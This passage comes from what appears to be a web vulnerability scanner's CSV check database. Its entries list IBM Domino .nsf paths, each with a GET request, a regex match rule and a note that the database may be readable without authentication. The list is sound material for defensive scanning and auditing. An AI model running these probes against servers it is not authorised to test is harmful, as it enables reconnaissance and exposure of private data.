information.\",\"\",\"\"\n\"007456\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/nntppost.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007457\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/notes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007458\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/ntsync4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007459\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/ntsync45.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007460\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/perweb.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007461\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/private.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007462\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/public.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007463\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/qpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007464\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickplace/quickplace/main.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007465\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickstart/qstart50.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007466\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/quickstart/wwsample.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007467\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/readme.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007468\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/reports.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007469\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/schema50.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007470\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/secret.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007471\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/setupweb.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007472\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smbcfg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007473\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smconf.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007474\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smency.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007475\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smmsg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007476\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smquar.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007477\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smsolar.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007478\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtime.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007479\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007480\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtpibwq.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007481\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtpobwq.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007482\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtptbls.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007483\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smvlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007484\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/software.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007485\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/statmail.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007486\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stauths.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007487\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stautht.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007488\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stconf.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007489\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stconfig.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007490\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stdnaset.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007491\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stdomino.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007492\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stlog.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007493\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/streg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007494\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/stsrc.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007495\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/test.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007496\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/today.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007497\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/userreg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007498\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/users.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007499\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/vpuserinfo.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007500\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/web.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007501\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/webuser.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007502\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/welcome.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007503\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/wksinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007504\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/domguide.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007505\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/dspug.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007506\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/help4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007507\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/helpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007508\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/helplt4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007509\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/internet.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007510\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/javapg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007511\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/lccon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007512\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/migrate.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007513\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/npn_admn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007514\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/npn_rn.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007515\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/readmec.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007516\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/readmes.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007517\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/smhelp.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007518\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/doc/srvinst.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007519\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/domguide.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007520\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dspug.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007521\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/domguide.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007522\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/dspug.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007523\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007524\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/helpadmin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007525\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/helplt4.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007526\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/internet.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007527\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/javapg.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007528\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/lccon.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be removed.\",\"\",\"\"\n\"007529\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/migrate.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This documentation database can be read without authentication. All default files should be 